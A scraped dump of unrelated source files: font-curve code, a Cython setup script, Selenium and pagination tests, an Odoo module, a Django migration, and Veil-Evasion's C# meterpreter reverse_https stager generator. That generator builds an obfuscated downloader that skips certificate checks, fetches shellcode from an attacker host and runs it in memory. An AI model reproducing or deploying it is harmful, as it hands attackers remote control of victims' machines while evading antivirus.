points = convertToQuadratic(pSegment.points[-1],segment.points[0],
segment.points[1],segment.points[2])
return RSegment(
'qcurve', [[int(i) for i in p] for p in points[1:]], segment.smooth)
def glyphCurvesToQuadratic(g):
for c in g:
segments = []
for i in range(len(c)):
s = c[i]
if s.type == "curve":
try:
segments.append(cubicSegmentToQuadratic(c, i))
except Exception:
print g.name, i
raise
else:
segments.append(s)
replaceSegments(c, segments)
| apache-2.0 |
aasensio/pyAbundance | setup.py | 1 | 1219 | from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# This line only needed if building with NumPy in Cython file.
from numpy import get_include
from os import system
# compile the fortran modules without linking
fortran_mod_comp = 'make clean ; make'
print fortran_mod_comp
system(fortran_mod_comp)
ext_modules = [Extension(# module name:
"pyAbundance",
# source file:
['pyAbundance.pyx'],
# other compile args for gcc
extra_compile_args=['-fPIC', '-O3'],
# other files to link to
extra_link_args=['chemical.o','-lgfortran'])]
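# A typical build invocation for this mixed Fortran/Cython setup
# (assuming gfortran and Cython are installed):
#   python setup.py build_ext --inplace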
setup(name = 'pyAbundance',
cmdclass = {'build_ext': build_ext},
# Needed if building with NumPy.
# This includes the NumPy headers when compiling.
include_dirs = [get_include()],
ext_modules = ext_modules,
version='0.1',
py_modules=['chemical'],
description='Chemical Equilibrium Package',
author='Andres Asensio Ramos',
author_email='[email protected]',
)
#system('cp pymilne.so ..')
| mit |
jsharkey13/isaac-selenium-testing | isaactest/tests/accept_cookies.py | 1 | 2196 | import time
from ..utils.log import log, INFO, ERROR, PASS
from ..utils.i_selenium import assert_tab
from ..utils.i_selenium import wait_for_xpath_element, wait_for_invisible_xpath
from ..tests import TestWithDependency
from selenium.common.exceptions import TimeoutException, NoSuchElementException
__all__ = ["accept_cookies"]
#####
# Test : Accept Cookies
#####
@TestWithDependency("ACCEPT_COOKIES", ["LOGIN"])
def accept_cookies(driver, ISAAC_WEB, WAIT_DUR, **kwargs):
"""Test whether the banner disappears after accepting cookies.
Should be run after "LOGIN" has been run, and before "LOGOUT".
- 'driver' should be a Selenium WebDriver.
- 'ISAAC_WEB' is the string URL of the Isaac website to be tested.
- 'WAIT_DUR' is the time in seconds to wait for JavaScript to run/load.
"""
assert_tab(driver, ISAAC_WEB)
time.sleep(WAIT_DUR)
try:
wait_for_xpath_element(driver, "//div[@data-alert and contains(@class, 'cookies-message')]")
time.sleep(WAIT_DUR)
log(INFO, "Clicking 'Accept' on the cookies message.")
cookie_message = driver.find_element_by_xpath("//a[contains(@class, 'cookies-accepted')]")
cookie_message.click()
except TimeoutException:
log(ERROR, "WARNING: Can't find cookies message! Has it already been accepted?!")
pass
except NoSuchElementException:
log(ERROR, "Unable to accept cookies!")
return False
try:
wait_for_invisible_xpath(driver, "//div[@data-alert and contains(@class, 'cookies-message')]")
except TimeoutException:
log(ERROR, "Cookie message didn't hide after being clicked!")
return False
try:
log(INFO, "Reloading the page to see if cookie message stays gone.")
driver.refresh()
time.sleep(WAIT_DUR)
wait_for_invisible_xpath(driver, "//div[@data-alert and contains(@class, 'cookies-message')]")
log(INFO, "Cookies message does not reappear.")
log(PASS, "The cookie message behaves as expected.")
return True
except TimeoutException:
log(ERROR, "Cookie message reappeared after page refresh!")
return False
| mit |
sgagnon/lyman-tools | timeseries/extract_info/mvpa-goodruntype_filt.py | 1 | 1176 | import os.path as op
smoothing = 'unsmoothed'
regspace = 'epi'
project = 'SST'
design = 'navcond_byruntype.csv'
func_exp = 'mvpa-resid_assigned'
onset_exp = 'mvpa-goodruntype_filt'
smoothing_fwhm = 0
standardize_feat = False
standardize_roi = False
percentsig_roi = False
percentsig_roi_relbaseline = False
tr = float(2)
tr_shift = [0, 2, 4, 6, 8, 10, 12] # in seconds
tr_integrate = [0, 2, 4, 6, 8, 10] # in seconds
basedir = op.join('/share/awagner/sgagnon', project)
analydir = op.join(basedir, 'analysis', func_exp)
expdir = op.join(basedir, 'analysis', onset_exp)
subjfile = op.join(basedir, 'scripts/subjects.txt')
# Filepath templates
tsfile = op.join(analydir, "{subid}", 'reg', regspace,
smoothing, "run_{run_id}", 'res4d_xfm.nii.gz')
func_maskfile = op.join(analydir, "{subid}", 'reg', regspace,
smoothing, "run_{run_id}", 'functional_mask_xfm.nii.gz')
maskfile = op.join(basedir, 'data', "{subid}", 'masks',
"{mask_name}.nii.gz")
meanfile = op.join(analydir, "{subid}", 'preproc',
"run_{run_id}", 'mean_func.nii.gz')
onsetfile = op.join(basedir, 'data', "{subid}", 'design', design)
| bsd-2-clause |
byt3bl33d3r/Veil-Evasion | modules/payloads/cs/meterpreter/rev_https.py | 4 | 7221 | """
Custom-written pure C# meterpreter/reverse_https stager.
Uses basic variable renaming obfuscation.
Module built by @harmj0y
"""
from modules.common import helpers
from modules.common import encryption
import random
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
self.language = "cs"
self.extension = "cs"
self.rating = "Excellent"
        # options we require user interaction for - format is {Option : [Value, Description]}
self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["8081", "Port of the metasploit handler"],
"compile_to_exe" : ["Y", "Compile to an executable"],
"use_arya" : ["N", "Use the Arya crypter"]}
def generate(self):
# imports and namespace setup
payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
payloadCode += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())
# code for the randomString() function
randomStringName = helpers.randomString()
bufferName = helpers.randomString()
charsName = helpers.randomString()
t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
# logic to turn off certificate validation
        validateServerCertificateName = helpers.randomString()
        payloadCode += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" %(validateServerCertificateName)
# code for the randomString() method
payloadCode += "static string %s(Random r, int s) {\n" %(randomStringName)
payloadCode += "char[] %s = new char[s];\n"%(bufferName)
payloadCode += "string %s = \"%s\";\n" %(charsName, chars)
payloadCode += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" %(bufferName, charsName, charsName)
payloadCode += "return new string(%s);}\n" %(bufferName)
# code for the checksum8() function
checksum8Name = helpers.randomString()
payloadCode += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" %(checksum8Name)
        # code for the genHTTPChecksum() function
genHTTPChecksumName = helpers.randomString()
baseStringName = helpers.randomString()
randCharsName = helpers.randomString()
urlName = helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
payloadCode += "static string %s(Random r) { string %s = \"\";\n" %(genHTTPChecksumName,baseStringName)
payloadCode += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" %(baseStringName,randomStringName)
payloadCode += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" %(randCharsName,randChars)
payloadCode += "for (int j = 0; j < %s.Length; ++j) {\n" %(randCharsName)
payloadCode += "string %s = %s + %s[j];\n" %(urlName,baseStringName,randCharsName)
payloadCode += "if (%s(%s)) {return %s;}}} return \"9vXU\";}"%(checksum8Name,urlName, urlName)
# code for getData() function
getDataName = helpers.randomString()
strName = helpers.randomString()
webClientName = helpers.randomString()
sName = helpers.randomString()
payloadCode += "static byte[] %s(string %s) {\n" %(getDataName,strName)
payloadCode += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" %(validateServerCertficateName)
payloadCode += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" %(webClientName)
payloadCode += "byte[] %s = null;\n" %(sName)
payloadCode += "try { %s = %s.DownloadData(%s);\n" %(sName, webClientName, strName)
payloadCode += "if (%s.Length < 100000) return null;}\n" %(sName)
payloadCode += "catch (WebException) {}\n"
payloadCode += "return %s;}\n" %(sName)
        # code for the inject() function to inject shellcode
injectName = helpers.randomString()
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
payloadCode += "static void %s(byte[] %s) {\n" %(injectName, sName)
payloadCode += " if (%s != null) {\n" %(sName)
payloadCode += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
payloadCode += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
payloadCode += " IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
payloadCode += " UInt32 %s = 0;\n" %(threadIdName)
payloadCode += " IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
payloadCode += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
payloadCode += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)
# code for Main() to launch everything
sName = helpers.randomString()
randomName = helpers.randomString()
payloadCode += "static void Main(){\n"
payloadCode += "Random %s = new Random((int)DateTime.Now.Ticks);\n" %(randomName)
payloadCode += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" %(sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0],genHTTPChecksumName,randomName)
payloadCode += "%s(%s);}\n" %(injectName, sName)
# get 12 random variables for the API imports
r = [helpers.randomString() for x in xrange(12)]
payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
if self.required_options["use_arya"][0].lower() == "y":
payloadCode = encryption.arya(payloadCode)
return payloadCode
| gpl-3.0 |
sergeii/swat4stats.com | tracker/south_migrations/0004_add_ip_length_index.py | 1 | 13644 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.execute('CREATE INDEX tracker_ip_length ON tracker_ip ((range_to - range_from))')
def backwards(self, orm):
db.execute('DROP INDEX tracker_ip_length')
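    # The expression index above serves queries that rank candidate IP
    # ranges by length, e.g. a hypothetical lookup such as:
    #   SELECT * FROM tracker_ip
    #   WHERE range_from <= X AND range_to >= X
    #   ORDER BY (range_to - range_from) LIMIT 1;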
models = {
'tracker.alias': {
'Meta': {'index_together': "(('name', 'isp'),)", 'object_name': 'Alias'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isp': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'on_delete': 'models.SET_NULL', 'null': 'True', 'to': "orm['tracker.ISP']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Profile']"})
},
'tracker.game': {
'Meta': {'object_name': 'Game'},
'coop_score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'date_finished': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
'gametype': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mapname': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'outcome': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'player_num': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'rd_bombs_defused': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'rd_bombs_total': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score_sus': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score_swat': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Server']", 'on_delete': 'models.SET_NULL', 'null': 'True'}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True', 'unique': 'True'}),
'time': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vict_sus': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vict_swat': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
},
'tracker.ip': {
'Meta': {'object_name': 'IP', 'unique_together': "(('range_from', 'range_to'),)"},
'date_created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isp': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.ISP']", 'null': 'True'}),
'range_from': ('django.db.models.fields.BigIntegerField', [], {}),
'range_to': ('django.db.models.fields.BigIntegerField', [], {})
},
'tracker.isp': {
'Meta': {'object_name': 'ISP'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'})
},
'tracker.loadout': {
'Meta': {'object_name': 'Loadout'},
'body': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'breacher': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_five': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_four': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_one': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_three': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_two': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'head': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'primary_ammo': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'secondary': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'secondary_ammo': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
},
'tracker.objective': {
'Meta': {'object_name': 'Objective'},
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.SmallIntegerField', [], {}),
'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
},
'tracker.player': {
'Meta': {'object_name': 'Player'},
'admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'alias': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Alias']"}),
'arrest_streak': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'arrested': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'arrests': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_arrests': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_incaps': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_incaps_invalid': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_kills_invalid': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_hostage_arrests': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_hostage_hits': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_hostage_incaps': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_hostage_kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_toc_reports': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'death_streak': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'deaths': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'dropped': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'kill_streak': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'loadout': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Loadout']", 'on_delete': 'models.SET_NULL', 'null': 'True'}),
'rd_bombs_defused': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'sg_escapes': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'sg_kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'suicides': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'team': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'teamkills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'time': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'vip_captures': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip_escapes': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip_kills_invalid': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip_kills_valid': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip_rescues': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
},
'tracker.procedure': {
'Meta': {'object_name': 'Procedure'},
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.SmallIntegerField', [], {}),
'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '7'})
},
'tracker.profile': {
'Meta': {'object_name': 'Profile'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'game_first': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'on_delete': 'models.SET_NULL', 'null': 'True', 'to': "orm['tracker.Game']"}),
'game_last': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'on_delete': 'models.SET_NULL', 'null': 'True', 'to': "orm['tracker.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'loadout': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Loadout']", 'on_delete': 'models.SET_NULL', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'team': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'})
},
'tracker.rank': {
'Meta': {'object_name': 'Rank', 'unique_together': "(('year', 'category', 'profile'),)"},
'category': ('django.db.models.fields.SmallIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'points': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'position': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'null': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Profile']"}),
'year': ('django.db.models.fields.SmallIntegerField', [], {})
},
'tracker.server': {
'Meta': {'object_name': 'Server', 'unique_together': "(('ip', 'port'),)"},
'country': ('django.db.models.fields.CharField', [], {'blank': 'True', 'max_length': '2', 'null': 'True'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'listed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.PositiveIntegerField', [], {}),
'port_gs1': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True', 'null': 'True'}),
'port_gs2': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True', 'null': 'True'}),
'streamed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'tracker.weapon': {
'Meta': {'object_name': 'Weapon'},
'distance': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'hits': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.SmallIntegerField', [], {}),
'player': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Player']"}),
'shots': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'teamhits': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'teamkills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'time': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
}
}
complete_apps = ['tracker'] | mit |
sadleader/odoo | addons/account_check_writing/account_voucher.py | 140 | 6284 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv,fields
from openerp.tools.translate import _
from openerp.tools.amount_to_text_en import amount_to_text
from lxml import etree
class account_voucher(osv.osv):
_inherit = 'account.voucher'
    def _make_journal_search(self, cr, uid, ttype, context=None):
        """When invoked from the check-writing screen (context key
        'write_check'), restrict the journal lookup to journals that allow
        check writing; otherwise search journals by type as usual."""
if context is None:
context = {}
journal_pool = self.pool.get('account.journal')
if context.get('write_check',False) :
return journal_pool.search(cr, uid, [('allow_check_writing', '=', True)], limit=1)
return journal_pool.search(cr, uid, [('type', '=', ttype)], limit=1)
_columns = {
'amount_in_word' : fields.char("Amount in Word", readonly=True, states={'draft':[('readonly',False)]}),
'allow_check' : fields.related('journal_id', 'allow_check_writing', type='boolean', string='Allow Check Writing'),
'number': fields.char('Number'),
}
def _amount_to_text(self, cr, uid, amount, currency_id, context=None):
# Currency complete name is not available in res.currency model
# Exceptions done here (EUR, USD, BRL) cover 75% of cases
# For other currencies, display the currency code
currency = self.pool['res.currency'].browse(cr, uid, currency_id, context=context)
if currency.name.upper() == 'EUR':
currency_name = 'Euro'
elif currency.name.upper() == 'USD':
currency_name = 'Dollars'
elif currency.name.upper() == 'BRL':
currency_name = 'reais'
else:
currency_name = currency.name
#TODO : generic amount_to_text is not ready yet, otherwise language (and country) and currency can be passed
#amount_in_word = amount_to_text(amount, context=context)
return amount_to_text(amount, currency=currency_name)
def onchange_amount(self, cr, uid, ids, amount, rate, partner_id, journal_id, currency_id, ttype, date, payment_rate_currency_id, company_id, context=None):
""" Inherited - add amount_in_word and allow_check_writting in returned value dictionary """
if not context:
context = {}
default = super(account_voucher, self).onchange_amount(cr, uid, ids, amount, rate, partner_id, journal_id, currency_id, ttype, date, payment_rate_currency_id, company_id, context=context)
if 'value' in default:
amount = 'amount' in default['value'] and default['value']['amount'] or amount
amount_in_word = self._amount_to_text(cr, uid, amount, currency_id, context=context)
default['value'].update({'amount_in_word':amount_in_word})
if journal_id:
allow_check_writing = self.pool.get('account.journal').browse(cr, uid, journal_id, context=context).allow_check_writing
default['value'].update({'allow_check':allow_check_writing})
return default
def print_check(self, cr, uid, ids, context=None):
if not ids:
            raise osv.except_osv(_('Printing error'), _('No check selected'))
data = {
'id': ids and ids[0],
'ids': ids,
}
return self.pool['report'].get_action(
cr, uid, [], 'account_check_writing.report_check', data=data, context=context
)
def create(self, cr, uid, vals, context=None):
if vals.get('amount') and vals.get('journal_id') and 'amount_in_word' not in vals:
vals['amount_in_word'] = self._amount_to_text(cr, uid, vals['amount'], vals.get('currency_id') or \
self.pool['account.journal'].browse(cr, uid, vals['journal_id'], context=context).currency.id or \
self.pool['res.company'].browse(cr, uid, vals['company_id']).currency_id.id, context=context)
return super(account_voucher, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
if vals.get('amount') and vals.get('journal_id') and 'amount_in_word' not in vals:
vals['amount_in_word'] = self._amount_to_text(cr, uid, vals['amount'], vals.get('currency_id') or \
self.pool['account.journal'].browse(cr, uid, vals['journal_id'], context=context).currency.id or \
self.pool['res.company'].browse(cr, uid, vals['company_id']).currency_id.id, context=context)
return super(account_voucher, self).write(cr, uid, ids, vals, context=context)
def fields_view_get(self, cr, uid, view_id=None, view_type=False, context=None, toolbar=False, submenu=False):
"""
        Add domain 'allow_check_writing = True' on the journal_id field and remove
        'widget = selection' on the same field, because a dynamic domain is not allowed on such a widget
"""
if not context: context = {}
res = super(account_voucher, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)
doc = etree.XML(res['arch'])
nodes = doc.xpath("//field[@name='journal_id']")
if context.get('write_check', False) :
for node in nodes:
node.set('domain', "[('type', '=', 'bank'), ('allow_check_writing','=',True)]")
node.set('widget', '')
res['arch'] = etree.tostring(doc)
return res
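    # Illustrative sketch (not part of the original module): with
    # context={'write_check': True}, the journal_id node in the arch returned
    # above ends up rendered as
    #   <field name="journal_id"
    #          domain="[('type', '=', 'bank'), ('allow_check_writing','=',True)]"
    #          widget=""/>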
| agpl-3.0 |
nesdis/djongo | tests/django_tests/tests/v21/tests/pagination/tests.py | 2 | 16095 | import unittest
from datetime import datetime
from django.core.paginator import (
EmptyPage, InvalidPage, PageNotAnInteger, Paginator,
UnorderedObjectListWarning,
)
from django.test import TestCase
from .custom import ValidAdjacentNumsPaginator
from .models import Article
class PaginationTests(unittest.TestCase):
"""
Tests for the Paginator and Page classes.
"""
def check_paginator(self, params, output):
"""
Helper method that instantiates a Paginator object from the passed
params and then checks that its attributes match the passed output.
"""
count, num_pages, page_range = output
paginator = Paginator(*params)
self.check_attribute('count', paginator, count, params)
self.check_attribute('num_pages', paginator, num_pages, params)
self.check_attribute('page_range', paginator, page_range, params, coerce=list)
def check_attribute(self, name, paginator, expected, params, coerce=None):
"""
Helper method that checks a single attribute and gives a nice error
message upon test failure.
"""
got = getattr(paginator, name)
if coerce is not None:
got = coerce(got)
self.assertEqual(
expected, got,
"For '%s', expected %s but got %s. Paginator parameters were: %s"
% (name, expected, got, params)
)
def test_paginator(self):
"""
Tests the paginator attributes using varying inputs.
"""
nine = [1, 2, 3, 4, 5, 6, 7, 8, 9]
ten = nine + [10]
eleven = ten + [11]
tests = (
# Each item is two tuples:
# First tuple is Paginator parameters - object_list, per_page,
# orphans, and allow_empty_first_page.
# Second tuple is resulting Paginator attributes - count,
# num_pages, and page_range.
# Ten items, varying orphans, no empty first page.
((ten, 4, 0, False), (10, 3, [1, 2, 3])),
((ten, 4, 1, False), (10, 3, [1, 2, 3])),
((ten, 4, 2, False), (10, 2, [1, 2])),
((ten, 4, 5, False), (10, 2, [1, 2])),
((ten, 4, 6, False), (10, 1, [1])),
# Ten items, varying orphans, allow empty first page.
((ten, 4, 0, True), (10, 3, [1, 2, 3])),
((ten, 4, 1, True), (10, 3, [1, 2, 3])),
((ten, 4, 2, True), (10, 2, [1, 2])),
((ten, 4, 5, True), (10, 2, [1, 2])),
((ten, 4, 6, True), (10, 1, [1])),
# One item, varying orphans, no empty first page.
(([1], 4, 0, False), (1, 1, [1])),
(([1], 4, 1, False), (1, 1, [1])),
(([1], 4, 2, False), (1, 1, [1])),
# One item, varying orphans, allow empty first page.
(([1], 4, 0, True), (1, 1, [1])),
(([1], 4, 1, True), (1, 1, [1])),
(([1], 4, 2, True), (1, 1, [1])),
# Zero items, varying orphans, no empty first page.
(([], 4, 0, False), (0, 0, [])),
(([], 4, 1, False), (0, 0, [])),
(([], 4, 2, False), (0, 0, [])),
# Zero items, varying orphans, allow empty first page.
(([], 4, 0, True), (0, 1, [1])),
(([], 4, 1, True), (0, 1, [1])),
(([], 4, 2, True), (0, 1, [1])),
            # Number of items one less than per_page.
(([], 1, 0, True), (0, 1, [1])),
(([], 1, 0, False), (0, 0, [])),
(([1], 2, 0, True), (1, 1, [1])),
((nine, 10, 0, True), (9, 1, [1])),
            # Number of items equal to per_page.
(([1], 1, 0, True), (1, 1, [1])),
(([1, 2], 2, 0, True), (2, 1, [1])),
((ten, 10, 0, True), (10, 1, [1])),
            # Number of items one more than per_page.
